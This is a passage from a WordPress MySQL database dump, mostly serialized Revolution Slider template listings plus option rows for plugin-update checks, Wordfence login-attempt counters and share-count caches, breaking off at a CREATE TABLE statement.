1\";s:3:\"img\";s:30:\"Church-Light-Footer/slide1.jpg\";}}s:13:\"rockable-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rockable-menu/slide1.jpg\";}}s:13:\"rockable-hero\";a:5:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"rockable-hero/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"rockable-hero/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"rockable-hero/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"rockable-hero/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"rockable-hero/slide5.jpg\";}}s:15:\"rockable-lineup\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"rockable-lineup/slide1.jpg\";}}s:17:\"rockable-lineup-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"rockable-lineup-2/slide1.jpg\";}}s:22:\"rockable-gallery-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"rockable-gallery-title/slide1.jpg\";}}s:16:\"rockable-gallery\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"rockable-gallery/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"rockable-gallery/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"rockable-gallery/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"rockable-gallery/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"rockable-gallery/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"rockable-gallery/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"rockable-gallery/slide7.jpg\";}}s:17:\"rockable-sponsors\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"rockable-sponsors/slide1.jpg\";}}s:15:\"rockable-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"rockable-footer/slide1.jpg\";}}s:21:\"rockable-detail-modal\";a:18:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:10;a:2:{s:5:\"title\";s:8:\"Slide 11\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:11;a:2:{s:5:\"title\";s:8:\"Slide 12\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:12;a:2:{s:5:\"title\";s:8:\"Slide 13\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:13;a:2:{s:5:\"title\";s:8:\"Slide 14\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:14;a:2:{s:5:\"title\";s:8:\"Slide 15\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:15;a:2:{s:5:\"title\";s:8:\"Slide 16\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:16;a:2:{s:5:\"title\";s:8:\"Slide 17\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}i:17;a:2:{s:5:\"title\";s:8:\"Slide 18\";s:3:\"img\";s:32:\"rockable-detail-modal/slide1.jpg\";}}s:23:\"rockable-detail-modal-2\";a:18:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:8;a:2:{s:5:\"title\";s:7:\"Slide 9\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:9;a:2:{s:5:\"title\";s:8:\"Slide 10\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:10;a:2:{s:5:\"title\";s:8:\"Slide 11\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:11;a:2:{s:5:\"title\";s:8:\"Slide 12\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:12;a:2:{s:5:\"title\";s:8:\"Slide 13\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:13;a:2:{s:5:\"title\";s:8:\"Slide 14\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:14;a:2:{s:5:\"title\";s:8:\"Slide 15\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:15;a:2:{s:5:\"title\";s:8:\"Slide 16\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:16;a:2:{s:5:\"title\";s:8:\"Slide 17\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}i:17;a:2:{s:5:\"title\";s:8:\"Slide 18\";s:3:\"img\";s:34:\"rockable-detail-modal-2/slide1.jpg\";}}s:27:\"real-estate-showcase-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:38:\"Real-Estate-Showcase-Slider/slide3.jpg\";}}s:16:\"isometric-slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"isometric-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"isometric-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"isometric-slider/slide3.jpg\";}}s:17:\"E-Commerce-Slider\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"Shoes-Store-Slider/slide3.jpg\";}}s:23:\"E-Commerce-Slider-Modal\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:35:\"Shoes-Store-Slider-Modal/slide3.jpg\";}}s:27:\"Woo-Commerce-Slider-Dynamic\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:37:\"Shoes-Store-Slider-Dynamic/slide3.jpg\";}}s:15:\"blooming-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"blooming-header/slide1.jpg\";}}s:14:\"blooming-about\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"blooming-about/slide1.jpg\";}}s:18:\"blooming-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"blooming-portfolio/slide1.jpg\";}}s:22:\"blooming-wedding-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-wedding-title/slide1.jpg\";}}s:25:\"blooming-wedding-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"blooming-wedding-carousel/slide6.jpg\";}}s:21:\"blooming-wedding-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-wedding-text/slide1.jpg\";}}s:22:\"blooming-parties-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-parties-title/slide1.jpg\";}}s:25:\"blooming-parties-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:36:\"blooming-parties-carousel/slide6.jpg\";}}s:21:\"blooming-parties-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-parties-text/slide1.jpg\";}}s:22:\"blooming-funeral-title\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"blooming-funeral-title/slide1.jpg\";}}s:23:\"blooming-funeral-slider\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:34:\"blooming-funeral-slider/slide6.jpg\";}}s:21:\"blooming-funeral-text\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"blooming-funeral-text/slide1.jpg\";}}s:16:\"blooming-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"blooming-contact/slide1.jpg\";}}s:13:\"particle-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"particle-hero/slide1.jpg\";}}s:17:\"bubble-morph-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"bubble-morph-hero/slide1.jpg\";}}s:13:\"parallax-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"parallax-hero/slide1.jpg\";}}s:10:\"video-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"video-hero/slide1.jpg\";}}s:14:\"ken-burns-hero\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"ken-burns-hero/slide1.jpg\";}}s:21:\"basic-hero-collection\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:32:\"basic-hero-collection/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:32:\"basic-hero-collection/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:32:\"basic-hero-collection/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:32:\"basic-hero-collection/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:32:\"basic-hero-collection/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:32:\"basic-hero-collection/slide6.jpg\";}}s:19:\"launching-very-soon\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:30:\"launching-very-soon/slide1.jpg\";}}s:18:\"Under-Construction\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"Under-Construction/slide1.jpg\";}}s:15:\"Particle-Effect\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"Particle-Effect/slide1.jpg\";}}s:17:\"Particle-Effect-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:28:\"Particle-Effect-2/slide1.jpg\";}}s:10:\"stark-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"stark-menu/slide1.jpg\";}}s:12:\"stark-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"stark-header/slide1.jpg\";}}s:13:\"stark-content\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"stark-content/slide1.jpg\";}}s:14:\"stark-carousel\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:25:\"stark-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:25:\"stark-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:25:\"stark-carousel/slide3.jpg\";}}s:15:\"stark-portfolio\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"stark-portfolio/slide1.jpg\";}}s:22:\"stark-portfolio-detail\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:33:\"stark-portfolio-detail/slide6.jpg\";}}s:13:\"stark-contact\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"stark-contact/slide1.jpg\";}}s:12:\"stark-footer\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"stark-footer/slide1.jpg\";}}s:16:\"stark-newsletter\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"stark-newsletter/slide1.jpg\";}}s:15:\"big-summer-sale\";a:3:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"big-summer-sale/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:26:\"big-summer-sale/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:26:\"big-summer-sale/slide3.jpg\";}}s:18:\"traveller-carousel\";a:6:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:29:\"traveller-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:29:\"traveller-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:29:\"traveller-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:29:\"traveller-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:29:\"traveller-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:29:\"traveller-carousel/slide6.jpg\";}}s:16:\"project-carousel\";a:7:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:27:\"project-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:27:\"project-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:27:\"project-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:27:\"project-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:27:\"project-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:27:\"project-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:27:\"project-carousel/slide7.jpg\";}}s:13:\"news-carousel\";a:8:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"news-carousel/slide1.jpg\";}i:1;a:2:{s:5:\"title\";s:7:\"Slide 2\";s:3:\"img\";s:24:\"news-carousel/slide2.jpg\";}i:2;a:2:{s:5:\"title\";s:7:\"Slide 3\";s:3:\"img\";s:24:\"news-carousel/slide3.jpg\";}i:3;a:2:{s:5:\"title\";s:7:\"Slide 4\";s:3:\"img\";s:24:\"news-carousel/slide4.jpg\";}i:4;a:2:{s:5:\"title\";s:7:\"Slide 5\";s:3:\"img\";s:24:\"news-carousel/slide5.jpg\";}i:5;a:2:{s:5:\"title\";s:7:\"Slide 6\";s:3:\"img\";s:24:\"news-carousel/slide6.jpg\";}i:6;a:2:{s:5:\"title\";s:7:\"Slide 7\";s:3:\"img\";s:24:\"news-carousel/slide7.jpg\";}i:7;a:2:{s:5:\"title\";s:7:\"Slide 8\";s:3:\"img\";s:24:\"news-carousel/slide8.jpg\";}}s:10:\"story-menu\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:21:\"story-menu/slide1.jpg\";}}s:12:\"story-header\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:23:\"story-header/slide1.jpg\";}}s:13:\"story-block-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-1/slide1.jpg\";}}s:15:\"story-content-1\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-1/slide1.jpg\";}}s:13:\"story-block-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-2/slide1.jpg\";}}s:13:\"story-block-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-3/slide1.jpg\";}}s:15:\"story-content-2\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-2/slide1.jpg\";}}s:13:\"story-block-4\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:24:\"story-block-4/slide1.jpg\";}}s:15:\"story-content-3\";a:1:{i:0;a:2:{s:5:\"title\";s:7:\"Slide 1\";s:3:\"img\";s:26:\"story-content-3/slide1.jpg\";}}}}', 'no');
INSERT INTO `zdenl_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(73584, '_site_transient_timeout_bsf_get_bundled_products', '1597412904', 'no'),
(73585, '_site_transient_bsf_get_bundled_products', '1', 'no'),
(73765, '_transient_timeout_wflginfl_00000000000000000000ffffb2143710', '1597002575', 'no'),
(73766, '_transient_wflginfl_00000000000000000000ffffb2143710', '2', 'no'),
(73777, '_transient_timeout_wflginfl_00000000000000000000ffffb955ef6e', '1597009839', 'no'),
(73778, '_transient_wflginfl_00000000000000000000ffffb955ef6e', '1', 'no'),
(73806, '_transient_timeout_wflginfl_00000000000000000000ffffb221e954', '1597025750', 'no'),
(73807, '_transient_wflginfl_00000000000000000000ffffb221e954', '1', 'no'),
(73827, '_transient_timeout_wflginfl_00000000000000000000ffffc05f1e3b', '1597036950', 'no'),
(73828, '_transient_wflginfl_00000000000000000000ffffc05f1e3b', '1', 'no'),
(73875, '_site_transient_update_plugins', 'O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1597795889;s:7:\"checked\";a:6:{s:39:\"us-header-builder/us-header-builder.php\";s:5:\"2.1.2\";s:23:\"revslider/revslider.php\";s:7:\"5.4.7.4\";s:41:\"Ultimate_VC_Addons/Ultimate_VC_Addons.php\";s:7:\"3.16.24\";s:23:\"wordfence/wordfence.php\";s:5:\"7.4.5\";s:27:\"js_composer/js_composer.php\";s:3:\"6.1\";s:27:\"wp-super-cache/wp-cache.php\";s:5:\"1.7.1\";}s:8:\"response\";a:1:{s:23:\"wordfence/wordfence.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:23:\"w.org/plugins/wordfence\";s:4:\"slug\";s:9:\"wordfence\";s:6:\"plugin\";s:23:\"wordfence/wordfence.php\";s:11:\"new_version\";s:6:\"7.4.10\";s:3:\"url\";s:40:\"https://wordpress.org/plugins/wordfence/\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/plugin/wordfence.7.4.10.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:62:\"https://ps.w.org/wordfence/assets/icon-256x256.png?rev=2070855\";s:2:\"1x\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";s:3:\"svg\";s:54:\"https://ps.w.org/wordfence/assets/icon.svg?rev=2070865\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:65:\"https://ps.w.org/wordfence/assets/banner-1544x500.jpg?rev=2124102\";s:2:\"1x\";s:64:\"https://ps.w.org/wordfence/assets/banner-772x250.jpg?rev=2124102\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:3:\"5.5\";s:12:\"requires_php\";s:3:\"5.3\";s:13:\"compatibility\";O:8:\"stdClass\":0:{}}}s:12:\"translations\";a:0:{}s:9:\"no_update\";a:1:{s:27:\"wp-super-cache/wp-cache.php\";O:8:\"stdClass\":9:{s:2:\"id\";s:28:\"w.org/plugins/wp-super-cache\";s:4:\"slug\";s:14:\"wp-super-cache\";s:6:\"plugin\";s:27:\"wp-super-cache/wp-cache.php\";s:11:\"new_version\";s:5:\"1.7.1\";s:3:\"url\";s:45:\"https://wordpress.org/plugins/wp-super-cache/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/wp-super-cache.1.7.1.zip\";s:5:\"icons\";a:2:{s:2:\"2x\";s:67:\"https://ps.w.org/wp-super-cache/assets/icon-256x256.png?rev=1095422\";s:2:\"1x\";s:67:\"https://ps.w.org/wp-super-cache/assets/icon-128x128.png?rev=1095422\";}s:7:\"banners\";a:2:{s:2:\"2x\";s:70:\"https://ps.w.org/wp-super-cache/assets/banner-1544x500.png?rev=1082414\";s:2:\"1x\";s:69:\"https://ps.w.org/wp-super-cache/assets/banner-772x250.png?rev=1082414\";}s:11:\"banners_rtl\";a:0:{}}}}', 'no'),
(73899, '_transient_timeout_us_sharing_count_b338a624def24009287404432a76a004', '1597009656', 'no'),
(73900, '_transient_us_sharing_count_b338a624def24009287404432a76a004', 'a:5:{s:8:\"facebook\";s:1:\"0\";s:7:\"twitter\";s:1:\"0\";s:5:\"gplus\";s:1:\"0\";s:8:\"linkedin\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";}', 'no'),
(73926, '_transient_timeout_us_sharing_count_ad751b45957692922acf148725c33fd9', '1597026915', 'no'),
(73927, '_transient_us_sharing_count_ad751b45957692922acf148725c33fd9', 'a:5:{s:8:\"facebook\";s:1:\"0\";s:7:\"twitter\";s:1:\"0\";s:5:\"gplus\";s:1:\"0\";s:8:\"linkedin\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";}', 'no'),
(73935, '_transient_timeout_us_sharing_count_6f8224717197ee6c6bf7182c019a22e4', '1597031105', 'no'),
(73936, '_transient_us_sharing_count_6f8224717197ee6c6bf7182c019a22e4', 'a:5:{s:8:\"facebook\";s:1:\"0\";s:7:\"twitter\";s:1:\"0\";s:5:\"gplus\";s:1:\"0\";s:8:\"linkedin\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";}', 'no'),
(73957, '_transient_timeout_us_sharing_count_ef3a4d4180ce80264949e1f1c641a4b0', '1597042124', 'no'),
(73958, '_transient_us_sharing_count_ef3a4d4180ce80264949e1f1c641a4b0', 'a:5:{s:8:\"facebook\";s:1:\"0\";s:7:\"twitter\";s:1:\"0\";s:5:\"gplus\";s:1:\"0\";s:8:\"linkedin\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";}', 'no'),
(73972, '_transient_timeout_us_sharing_count_95d531c2a420115532799d969c91cd0a', '1597051434', 'no'),
(73973, '_transient_us_sharing_count_95d531c2a420115532799d969c91cd0a', 'a:5:{s:8:\"facebook\";s:1:\"0\";s:7:\"twitter\";s:1:\"0\";s:5:\"gplus\";s:1:\"0\";s:8:\"linkedin\";s:1:\"0\";s:9:\"pinterest\";s:1:\"0\";}', 'no'),
(73978, '_transient_doing_cron', '1597796248.8591549396514892578125', 'yes'),
(73995, '_site_transient_timeout_theme_roots', '1597797676', 'no'),
(73996, '_site_transient_theme_roots', 'a:2:{s:13:\"Impreza-child\";s:7:\"/themes\";s:7:\"Impreza\";s:7:\"/themes\";}', 'no');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_postmeta`
--

CREATE TABLE `zdenl_postmeta` (
